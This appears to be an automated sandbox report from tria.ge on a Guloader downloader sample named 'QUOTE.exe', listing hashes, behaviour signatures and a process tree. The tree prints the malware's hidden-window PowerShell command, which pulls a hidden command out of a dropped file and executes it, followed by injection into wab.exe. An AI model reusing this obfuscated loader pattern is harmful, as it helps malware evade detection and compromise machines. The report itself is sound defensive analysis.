Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
-
submitted
15/03/2024, 02:03
General
-
Target
QUOTE.exe
-
Size
346KB
-
MD5
70c8145c188bf89c25f085e001c6f9a7
-
SHA1
d3e24cdd7272965ba04b8a0a7013c79e2633f7aa
-
SHA256
4cb733e05325fdf02dfaf5982ca2a8917373658aed1e328869077e92c6d73225
-
SHA512
445f9f092241810359fcd7e319ec5f0dc40a4f19656484085a37201b5dd348a246bb1916b9ee526292cdab00068c5f2ddaacc259470c440d4bd82c6ad6cfa40c
-
SSDEEP
6144:5XCKG5Hob1T0qQzmnMpv+j++KqfUuuMSR7EDaLLt+a5YiCmbnIGZmXjeqJKnuG2a:5XcHy1gqOppGq+k1imLwauAZCjeqJKuE
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 14 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\QUOTE.exe"C:\Users\Admin\AppData\Local\Temp\QUOTE.exe"1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -windowstyle hidden "$Isocracy202=Get-Content 'C:\Users\Admin\AppData\Local\Temp\gyllepumper\kamgavls\jargonels\Infami\Metagaster\Brnehaveklasserne.Mom';$Alderdoms=$Isocracy202.SubString(54858,3);.$Alderdoms($Isocracy202)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"3⤵
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
326KB
MD52348c28b6ff7851f7162d654f935091f
SHA18442a4fa957f48402c3e3c2edd240acc5d4613cd
SHA2566eb4bdccdb2c134c8083246c4dbfcb256f04e49b1689193422bc41b4b443164c
SHA51227c9b48638d3ef6a191bf2861ee7ac86b4960a8e5b701f7db2787087fbe58e1d927dfa7247be90f35db6a6d7568110c3175e11b36e113d08bb021a7ce70d8771
-
Filesize
53KB
MD52a4402450d6e37b4c5f6434e8e2548ae
SHA129b0d015b4c7420b576f3ce745b95f16f416045e
SHA25605e03c9da534face56a3181a98e7194ce73a4638f713523d26aa97486f427eea
SHA512e5a69a27041b0c1f8592861e820da036edc41cf3b0d630a6eea8e1cb8935ff88a5aec6a231e240c2c3fa52c47c64608ea84924cb6165170e3ee144335fbb4387
-
Filesize
1.7MB
-
Filesize
856KB
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
5.7MB
-
Filesize
16KB
-
Filesize
27.1MB
-
Filesize
27.1MB
-
Filesize
5.7MB
-
Filesize
256KB
-
Filesize
27.1MB
-
Filesize
5.7MB
-
Filesize
256KB
-
Filesize
27.1MB
-
Filesize
4KB
-
Filesize
1.7MB
-
Filesize
16.4MB
-
Filesize
856KB
-
Filesize
27.1MB
-
Filesize
27.1MB